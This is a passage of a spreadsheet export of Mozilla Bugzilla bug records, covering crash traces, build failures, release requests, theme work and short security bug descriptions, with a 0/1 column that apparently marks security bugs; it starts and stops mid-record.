    #11 0x7fc2c155e634 in nsCSSFrameConstructor::ConstructBlock(nsFrameConstructorState&amp;, nsIContent*, nsContainerFrame*, nsContainerFrame*, nsStyleContext*, nsContainerFrame**, nsFrameItems&amp;, nsIFrame*, PendingBinding*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:12081:3
    #12 0x7fc2c155a0c4 in nsCSSFrameConstructor::ConstructDocElementFrame(mozilla::dom::Element*, nsILayoutHistoryState*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:2643:5
    #13 0x7fc2c157ec30 in nsCSSFrameConstructor::ContentRangeInserted(nsIContent*, nsIContent*, nsIContent*, nsILayoutHistoryState*, bool, TreeMatchContext*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:7837:7
    #14 0x7fc2c1576672 in ContentInserted /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:7722:10
    #15 0x7fc2c1576672 in nsCSSFrameConstructor::RecreateFramesForContent(nsIContent*, bool, nsCSSFrameConstructor::RemoveFlags, nsIContent**) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:9826
    #16 0x7fc2c14a5df9 in mozilla::RestyleManager::ProcessRestyledFrames(nsStyleChangeList&amp;) /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:1516:7
    #17 0x7fc2c148a3ba in mozilla::GeckoRestyleManager::ComputeAndProcessStyleChange(nsIFrame*, nsChangeHint, mozilla::RestyleTracker&amp;, nsRestyleHint, mozilla::RestyleHintData const&amp;) /home/worker/workspace/build/src/layout/base/GeckoRestyleManager.cpp:3516:3
    #18 0x7fc2c1489874 in mozilla::GeckoRestyleManager::RestyleElement(mozilla::dom::Element*, nsIFrame*, nsChangeHint, mozilla::RestyleTracker&amp;, nsRestyleHint, mozilla::RestyleHintData const&amp;) /home/worker/workspace/build/src/layout/base/GeckoRestyleManager.cpp:152:5
    #19 0x7fc2c151787e in ProcessOneRestyle /home/worker/workspace/build/src/layout/base/RestyleTracker.cpp:95:5
    #20 0x7fc2c151787e in mozilla::RestyleTracker::DoProcessRestyles() /home/worker/workspace/build/src/layout/base/RestyleTracker.cpp:262
    #21 0x7fc2c148dbef in ProcessRestyles /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/GeckoRestyleManager.h:386:7
    #22 0x7fc2c148dbef in mozilla::GeckoRestyleManager::ProcessPendingRestyles() /home/worker/workspace/build/src/layout/base/GeckoRestyleManager.cpp:505
    #23 0x7fc2c14dae10 in ProcessPendingRestyles /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RestyleManagerInlines.h:44:3
    #24 0x7fc2c14dae10 in mozilla::PresShell::DoFlushPendingNotifications(mozilla::ChangesToFlush) /home/worker/workspace/build/src/layout/base/PresShell.cpp:4184
    #25 0x7fc2bd5e351e in FlushPendingNotifications /home/worker/workspace/build/src/obj-firefox/dist/include/nsIPresShell.h:599:5
    #26 0x7fc2bd5e351e in nsDocument::FlushPendingNotifications(mozilla::FlushType) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8007
    #27 0x7fc2bd62bd6e in nsFocusManager::CheckIfFocusable(nsIContent*, unsigned int) /home/worker/workspace/build/src/dom/base/nsFocusManager.cpp:1550:3
    #28 0x7fc2bd62840c in nsFocusManager::SetFocusInner(nsIContent*, int, bool, bool) /home/worker/workspace/build/src/dom/base/nsFocusManager.cpp:1180:41
    #29 0x7fc2bd62b7ae in nsFocusManager::SetFocus(nsIDOMElement*, unsigned int) /home/worker/workspace/build/src/dom/base/nsFocusManager.cpp:484:3
    #30 0x7fc2bd3b892f in mozilla::dom::Element::Focus(mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/dom/base/Element.cpp:311:14
    #31 0x7fc2bec55ce8 in mozilla::dom::HTMLElementBinding::focus(JSContext*, JS::Handle&lt;JSObject*&gt;, nsGenericHTMLElement*, JSJitMethodCallArgs const&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/HTMLElementBinding.cpp:462:3
    #32 0x7fc2bef5b617 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2953:13
    #33 0x7fc2c4a2917f in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
    #34 0x7fc2c4a2917f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:448
    #35 0x7fc2c4a29b72 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:512:10
    #36 0x7fc2c56a971c in js::Wrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:165:12
    #37 0x7fc2c56603ae in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:353:14
SUMMARY: AddressSanitizer: heap-use-after-free /home/worker/workspace/build/src/layout/generic/nsSelection.cpp:972:8 in nsFrameSelection::MoveCaret(nsDirection, bool, nsSelectionAmount, nsFrameSelection::CaretMovementStyle)
Shadow bytes around the buggy address:
  0x0c2280056870: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa
  0x0c2280056880: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c2280056890: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c22800568a0: fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa fa
  0x0c22800568b0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=&gt;0x0c22800568c0: fd fd fd fd fd fd fd[fd]fd fd fd fd fd fa fa fa
  0x0c22800568d0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c22800568e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c22800568f0: 00 fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c2280056900: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2280056910: fd fd fd fd fd fd fd fd fd fd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9751==ABORTING</t>
        </is>
      </c>
      <c r="X723" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="724">
      <c r="A724" t="n">
        <v>1621100</v>
      </c>
      <c r="B724" t="inlineStr">
        <is>
          <t>2020-03-09 12:06:19 -0700</t>
        </is>
      </c>
      <c r="C724" t="inlineStr">
        <is>
          <t>Prepare talk for Rosenfeld Enterprise Experience 2020 conference</t>
        </is>
      </c>
      <c r="D724" t="inlineStr">
        <is>
          <t>2020-09-15 10:03:56 -0700</t>
        </is>
      </c>
      <c r="E724" t="n">
        <v>1</v>
      </c>
      <c r="F724" t="n">
        <v>1</v>
      </c>
      <c r="G724" t="n">
        <v>5</v>
      </c>
      <c r="H724" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I724" t="inlineStr">
        <is>
          <t>User Research</t>
        </is>
      </c>
      <c r="J724" t="inlineStr">
        <is>
          <t>Project Request</t>
        </is>
      </c>
      <c r="K724" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L724" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M724" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N724" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O724" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P724" t="inlineStr"/>
      <c r="Q724" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R724" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S724" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T724" t="n">
        <v>1</v>
      </c>
      <c r="U724" t="n">
        <v>0</v>
      </c>
      <c r="V724" t="n">
        <v>2</v>
      </c>
      <c r="W724" t="inlineStr">
        <is>
          <t>**Request Description** 
I will be giving a talk at Rosenfeld's Enterprise Experience 2020 conference in June.
**Deadline** 
June 11, 2020
**Priority Level** 
2 
**Priority Level Description** 
Because outside of regular project work
**Supporting Information**
https://rosenfeldmedia.com/enterprise2020/speakers/sharon-bautista/</t>
        </is>
      </c>
      <c r="X724" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="725">
      <c r="A725" t="n">
        <v>842106</v>
      </c>
      <c r="B725" t="inlineStr">
        <is>
          <t>2013-02-16 20:22:40 -0800</t>
        </is>
      </c>
      <c r="C725" t="inlineStr">
        <is>
          <t>Permanent red: /installer/package-name.mk:143: /builds/slave/tb-c-cen-lx-000000000000000000/build/config/makefiles/makeutils.mk: No such file or directory</t>
        </is>
      </c>
      <c r="D725" t="inlineStr">
        <is>
          <t>2013-02-18 02:05:51 -0800</t>
        </is>
      </c>
      <c r="E725" t="n">
        <v>1</v>
      </c>
      <c r="F725" t="n">
        <v>1</v>
      </c>
      <c r="G725" t="n">
        <v>3</v>
      </c>
      <c r="H725" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I725" t="inlineStr">
        <is>
          <t>MailNews Core</t>
        </is>
      </c>
      <c r="J725" t="inlineStr">
        <is>
          <t>Build Config</t>
        </is>
      </c>
      <c r="K725" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L725" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M725" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N725" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O725" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P725" t="inlineStr"/>
      <c r="Q725" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R725" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S725" t="inlineStr">
        <is>
          <t>Thunderbird 21.0</t>
        </is>
      </c>
      <c r="T725" t="n">
        <v>1</v>
      </c>
      <c r="U725" t="n">
        <v>0</v>
      </c>
      <c r="V725" t="n">
        <v>8</v>
      </c>
      <c r="W725" t="inlineStr">
        <is>
          <t>comm-central is fully busted. jcranmer suspects bug 746277.
Here's the log spew:
checking for strip... (cached) /usr/bin/strip
checking for windres... no
checking for gcc -pipe support... yes
checking for perl5... (cached) /usr/bin/perl
checking for dlopen... no
checking for dlopen in -ldl... (cached) yes
checking whether /tools/gcc-4.5-0moz3/bin/gcc needs -traditional... (cached) no
checking for lchown... (cached) yes
checking for strerror... (cached) yes
checking for getaddrinfo... yes
checking for getnameinfo... yes
checking for pthread_create in -lpthreads... no
checking for pthread_create in -lpthread... yes
checking for --with-sasl... no
checking for --with-sasl-inc... no
checking for --with-sasl-lib... no
checking for getaddrinfo... (cached) yes
checking for sasl_client_init in -lsasl2... no
checking for sasl_client_init in -lsasl... no
checking whether /tools/gcc-4.5-0moz3/bin/gcc accepts -pthread... yes
updating cache ../../.././config.cache
creating ./config.status
creating Makefile
creating config/Makefile
creating config/autoconf.mk
creating ldap/Makefile
creating ldap/clients/tools/Makefile
creating ldap/include/Makefile
creating ldap/libraries/Makefile
creating ldap/libraries/libldap/Makefile
creating ldap/libraries/libprldap/Makefile
creating ldap/libraries/libldif/Makefile
creating ldap/libraries/liblber/Makefile
creating ldap/libraries/libiutil/Makefile
creating ldap/libraries/libssldap/Makefile
creating ldap/libraries/libutil/Makefile
make[2]: Leaving directory `/builds/slave/tb-c-cen-lx-000000000000000000/build'
make -j6 -C objdir-tb
/builds/slave/tb-c-cen-lx-000000000000000000/build/mozilla/toolkit/mozapps/installer/package-name.mk:143: /builds/slave/tb-c-cen-lx-000000000000000000/build/config/makefiles/makeutils.mk: No such file or directory
make[2]: Entering directory `/builds/slave/tb-c-cen-lx-000000000000000000/build/objdir-tb'
make[2]: *** No rule to make target `/builds/slave/tb-c-cen-lx-000000000000000000/build/config/makefiles/makeutils.mk'.  Stop.
make[2]: Leaving directory `/builds/slave/tb-c-cen-lx-000000000000000000/build/objdir-tb'
make[1]: *** [build] Error 2
make[1]: Leaving directory `/builds/slave/tb-c-cen-lx-000000000000000000/build'
make: *** [build] Error 2
DEBUG: shell: unmounting all filesystems
DEBUG: Executing command: umount -n /builds/mock_mozilla/mozilla-centos6-i386/root/dev/shm
DEBUG: Child return code was: 0
DEBUG: Executing command: umount -n /builds/mock_mozilla/mozilla-centos6-i386/root/dev/pts
DEBUG: Child return code was: 0
DEBUG: Executing command: umount -n /builds/mock_mozilla/mozilla-centos6-i386/root/tmp/ccache
DEBUG: Child return code was: 0
DEBUG: Executing command: umount -n /builds/mock_mozilla/mozilla-centos6-i386/root/targetdata/
DEBUG: Child return code was: 0
DEBUG: Executing command: umount -n /builds/mock_mozilla/mozilla-centos6-i386/root/tmp/.X11-unix
DEBUG: Child return code was: 0
DEBUG: Executing command: umount -n /builds/mock_mozilla/mozilla-centos6-i386/root/builds/git-shared
DEBUG: Child return code was: 0
DEBUG: Executing command: umount -n /builds/mock_mozilla/mozilla-centos6-i386/root/builds/hg-shared
DEBUG: Child return code was: 0
DEBUG: Executing command: umount -n /builds/mock_mozilla/mozilla-centos6-i386/root/builds/ccache
DEBUG: Child return code was: 0
DEBUG: Executing command: umount -n /builds/mock_mozilla/mozilla-centos6-i386/root/builds/slave
DEBUG: Child return code was: 0
DEBUG: Executing command: umount -n /builds/mock_mozilla/mozilla-centos6-i386/root/var/cache/yum
DEBUG: Child return code was: 0
DEBUG: Executing command: umount -n /builds/mock_mozilla/mozilla-centos6-i386/root/sys
DEBUG: Child return code was: 0
DEBUG: Executing command: umount -n /builds/mock_mozilla/mozilla-centos6-i386/root/proc
DEBUG: Child return code was: 0
DEBUG: shell: calling postshell hooks
State Changed: unlock buildroot
program finished with exit code 2
elapsedTime=194.229777
========= Finished compile failed (results: 2, elapsed: 3 mins, 14 secs) (at 2013-02-16 16:30:42.617298) =========</t>
        </is>
      </c>
      <c r="X725" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="726">
      <c r="A726" t="n">
        <v>599610</v>
      </c>
      <c r="B726" t="inlineStr">
        <is>
          <t>2010-09-25 06:21:30 -0700</t>
        </is>
      </c>
      <c r="C726" t="inlineStr">
        <is>
          <t>PurgeScriptFragments may not purge all fragments</t>
        </is>
      </c>
      <c r="D726" t="inlineStr">
        <is>
          <t>2015-10-16 11:39:49 -0700</t>
        </is>
      </c>
      <c r="E726" t="n">
        <v>1</v>
      </c>
      <c r="F726" t="n">
        <v>1</v>
      </c>
      <c r="G726" t="n">
        <v>3</v>
      </c>
      <c r="H726" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I726" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J726" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K726" t="inlineStr">
        <is>
          <t>1.9.2 Branch</t>
        </is>
      </c>
      <c r="L726" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M726" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N726" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O726" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P726" t="inlineStr">
        <is>
          <t>[sg:critical] [qa-examined-192] [qa-needs-STR]</t>
        </is>
      </c>
      <c r="Q726" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R726" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S726" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T726" t="n">
        <v>1</v>
      </c>
      <c r="U726" t="n">
        <v>0</v>
      </c>
      <c r="V726" t="n">
        <v>39</v>
      </c>
      <c r="W726" t="inlineStr">
        <is>
          <t>PurgeScriptFragments only looks for trace fragments that are found in TraceMonitor for the current thread. This misses other threads that also may contain the fragments for the script. For example, the GC never runs on a web worker thread so the GC will never purge any fragments for web worker functions. This is hazardous as the fragments may match a newly allocate script that reused memory from the deleted script.</t>
        </is>
      </c>
      <c r="X726" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="727">
      <c r="A727" t="n">
        <v>594688</v>
      </c>
      <c r="B727" t="inlineStr">
        <is>
          <t>2010-09-09 00:40:55 -0700</t>
        </is>
      </c>
      <c r="C727" t="inlineStr">
        <is>
          <t>Request to move Solaris contrib. builds for Firefox 4.0b5 to bouncer</t>
        </is>
      </c>
      <c r="D727" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E727" t="n">
        <v>1</v>
      </c>
      <c r="F727" t="n">
        <v>1</v>
      </c>
      <c r="G727" t="n">
        <v>5</v>
      </c>
      <c r="H727" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I727" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J727" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K727" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L727" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M727" t="inlineStr">
        <is>
          <t>Solaris</t>
        </is>
      </c>
      <c r="N727" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O727" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P727" t="inlineStr"/>
      <c r="Q727" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R727" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S727" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T727" t="n">
        <v>1</v>
      </c>
      <c r="U727" t="n">
        <v>0</v>
      </c>
      <c r="V727" t="n">
        <v>2</v>
      </c>
      <c r="W727" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #590357 +++
solaris-sparc:
/firefox/releases/4.0b5/contrib/solaris_tarball/firefox-4.0b5.en-US.solaris-10-fcs-sparc.tar.bz2
solaris-i386:
/firefox/releases/4.0b5/contrib/solaris_tarball/firefox-4.0b5.en-US.solaris-10-fcs-i386.tar.bz2
opensolaris-sparc:
/firefox/releases/4.0b5/contrib/solaris_tarball/firefox-4.0b5.en-US.opensolaris-sparc.tar.bz2
opensolaris-i386:
/firefox/releases/4.0b5/contrib/solaris_tarball/firefox-4.0b5.en-US.opensolaris-i386.tar.bz2
The partial MAR for (4.0b4 to 4.0b5):
/firefox/releases/4.0b5/contrib/solaris_tarball/firefox-4.0b4-4.0b5.en-US.solaris-10-fcs-sparc.partial.mar
/firefox/releases/4.0b5/contrib/solaris_tarball/firefox-4.0b4-4.0b5.en-US.solaris-10-fcs-i386.partial.mar
/firefox/releases/4.0b5/contrib/solaris_tarball/firefox-4.0b4-4.0b5.en-US.opensolaris-sparc.partial.mar
/firefox/releases/4.0b5/contrib/solaris_tarball/firefox-4.0b4-4.0b5.en-US.opensolaris-i386.partial.mar
The complete MAR for 4.0b5:
/firefox/releases/4.0b5/contrib/solaris_tarball/firefox-4.0b5.en-US.solaris-10-fcs-sparc.complete.mar
/firefox/releases/4.0b5/contrib/solaris_tarball/firefox-4.0b5.en-US.solaris-10-fcs-i386.complete.mar
/firefox/releases/4.0b5/contrib/solaris_tarball/firefox-4.0b5.en-US.opensolaris-sparc.complete.mar
/firefox/releases/4.0b5/contrib/solaris_tarball/firefox-4.0b5.en-US.opensolaris-i386.complete.mar
Thanks!</t>
        </is>
      </c>
      <c r="X727" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="728">
      <c r="A728" t="n">
        <v>1399498</v>
      </c>
      <c r="B728" t="inlineStr">
        <is>
          <t>2017-09-13 07:31:59 -0700</t>
        </is>
      </c>
      <c r="C728" t="inlineStr">
        <is>
          <t>[Windows 7] Make Background Tabs Dark for Default Theme</t>
        </is>
      </c>
      <c r="D728" t="inlineStr">
        <is>
          <t>2020-03-10 02:30:27 -0700</t>
        </is>
      </c>
      <c r="E728" t="n">
        <v>1</v>
      </c>
      <c r="F728" t="n">
        <v>1</v>
      </c>
      <c r="G728" t="n">
        <v>2</v>
      </c>
      <c r="H728" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I728" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J728" t="inlineStr">
        <is>
          <t>Theme</t>
        </is>
      </c>
      <c r="K728" t="inlineStr">
        <is>
          <t>57 Branch</t>
        </is>
      </c>
      <c r="L728" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M728" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N728" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O728" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P728" t="inlineStr">
        <is>
          <t>[reserve-photon-visual]</t>
        </is>
      </c>
      <c r="Q728" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R728" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S728" t="inlineStr">
        <is>
          <t>Firefox 57</t>
        </is>
      </c>
      <c r="T728" t="n">
        <v>1</v>
      </c>
      <c r="U728" t="n">
        <v>0</v>
      </c>
      <c r="V728" t="n">
        <v>31</v>
      </c>
      <c r="W728" t="inlineStr">
        <is>
          <t>Background tabs should be dark and be in a solid box not floating on the glass fog background:
http://design.firefox.com/people/shorlander/photon/Mockups/windows-7.html</t>
        </is>
      </c>
      <c r="X728" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="729">
      <c r="A729" t="n">
        <v>1493900</v>
      </c>
      <c r="B729" t="inlineStr">
        <is>
          <t>2018-09-25 01:18:28 -0700</t>
        </is>
      </c>
      <c r="C729" t="inlineStr">
        <is>
          <t>Firefox RCE from Hack2Win</t>
        </is>
      </c>
      <c r="D729" t="inlineStr">
        <is>
          <t>2018-10-22 09:19:52 -0700</t>
        </is>
      </c>
      <c r="E729" t="n">
        <v>1</v>
      </c>
      <c r="F729" t="n">
        <v>1</v>
      </c>
      <c r="G729" t="n">
        <v>3</v>
      </c>
      <c r="H729" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I729" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J729" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K729" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L729" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M729" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N729" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O729" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P729" t="inlineStr"/>
      <c r="Q729" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R729" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S729" t="inlineStr">
        <is>
          <t>mozilla64</t>
        </is>
      </c>
      <c r="T729" t="n">
        <v>1</v>
      </c>
      <c r="U729" t="n">
        <v>0</v>
      </c>
      <c r="V729" t="n">
        <v>34</v>
      </c>
      <c r="W729" t="inlineStr">
        <is>
          <t>Created attachment 9011702
fifo rce writeup (pdf)
We received the 2018 Hack2Win "Firefox RCE" exploit from Noam Rathaus of Beyond Security.
Please use the following for the acknowledgement.
"Three independent security researcher, Niklas Baumstark, Samuel Groß and Bruno Keith, have reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program."</t>
        </is>
      </c>
      <c r="X729" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="730">
      <c r="A730" t="n">
        <v>1547179</v>
      </c>
      <c r="B730" t="inlineStr">
        <is>
          <t>2019-04-25 22:30:22 -0700</t>
        </is>
      </c>
      <c r="C730" t="inlineStr">
        <is>
          <t>Assertion failure: collectCoverage(), at js/src/vm/Realm.cpp:341</t>
        </is>
      </c>
      <c r="D730" t="inlineStr">
        <is>
          <t>2019-06-11 18:36:48 -0700</t>
        </is>
      </c>
      <c r="E730" t="n">
        <v>1</v>
      </c>
      <c r="F730" t="n">
        <v>1</v>
      </c>
      <c r="G730" t="n">
        <v>3</v>
      </c>
      <c r="H730" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I730" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J730" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K730" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L730" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M730" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N730" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O730" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P730" t="inlineStr">
        <is>
          <t>[jsbugmon:]</t>
        </is>
      </c>
      <c r="Q730" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R730" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S730" t="inlineStr">
        <is>
          <t>mozilla68</t>
        </is>
      </c>
      <c r="T730" t="n">
        <v>1</v>
      </c>
      <c r="U730" t="n">
        <v>0</v>
      </c>
      <c r="V730" t="n">
        <v>9</v>
      </c>
      <c r="W730" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision 7e40e33da3da (build with --enable-debug, run with --fuzzing-safe --no-threads --ion-eager --ion-pgo=off --gc-zeal=2 --dump-bytecode):
    quit();
Backtrace:
#0  JS::Realm::traceRoots (this=0x7f0ae0553800, trc=0x7f0ae051c6d0, traceOrMark=&lt;optimized out&gt;) at js/src/vm/Realm.cpp:341
#1  0x0000557d5a590e9d in js::gc::GCRuntime::traceRuntimeCommon (this=&lt;optimized out&gt;, trc=0x7f0ae051c6d0, traceOrMark=js::gc::GCRuntime::MarkRuntime) at js/src/gc/RootMarking.cpp:383
#2  0x0000557d5a5906c2 in js::gc::GCRuntime::traceRuntimeForMajorGC (this=0x7f0ae051b6d8, trc=0x7f0ae051c6d0, session=...) at js/src/gc/RootMarking.cpp:285
#3  0x0000557d5a4f3c54 in js::gc::GCRuntime::beginMarkPhase (this=0x7f0ae051b6d8, reason=&lt;optimized out&gt;, session=...) at js/src/gc/GC.cpp:4407
#4  0x0000557d5a504f3d in js::gc::GCRuntime::incrementalSlice (this=0x7f0ae051b6d8, budget=..., reason=JS::GCReason::DEBUG_GC, session=...) at js/src/gc/GC.cpp:7024
/snip
For detailed crash information, see attachment.</t>
        </is>
      </c>
      <c r="X730" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="731">
      <c r="A731" t="n">
        <v>898242</v>
      </c>
      <c r="B731" t="inlineStr">
        <is>
          <t>2013-07-25 19:14:06 -0700</t>
        </is>
      </c>
      <c r="C731" t="inlineStr">
        <is>
          <t>[Buri][Calendar]The reminder time cann't be changed after changing calendar setting</t>
        </is>
      </c>
      <c r="D731" t="inlineStr">
        <is>
          <t>2013-11-04 15:01:27 -0800</t>
        </is>
      </c>
      <c r="E731" t="n">
        <v>1</v>
      </c>
      <c r="F731" t="n">
        <v>1</v>
      </c>
      <c r="G731" t="n">
        <v>6</v>
      </c>
      <c r="H731" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I731" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J731" t="inlineStr">
        <is>
          <t>Gaia::Calendar</t>
        </is>
      </c>
      <c r="K731" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L731" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M731" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N731" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O731" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P731" t="inlineStr"/>
      <c r="Q731" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R731" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S731" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T731" t="n">
        <v>1</v>
      </c>
      <c r="U731" t="n">
        <v>0</v>
      </c>
      <c r="V731" t="n">
        <v>20</v>
      </c>
      <c r="W731" t="inlineStr">
        <is>
          <t>AU_LINUX_GECKO_ICS_STRAWBERRY.01.01.00.019.164
 Firefox os  v1.1
 Mozilla build ID:20130715070218
 Created an attachment (id=470199)
 PR pic
 DEFECT DESCRIPTION:
 The reminder time cann't be changed after changing calendar setting
 REPRODUCING PROCEDURES:
 1. Launch Calendar app -&gt;  enter calendar settings page -&gt; set all-day events reminders as 'None', press Done
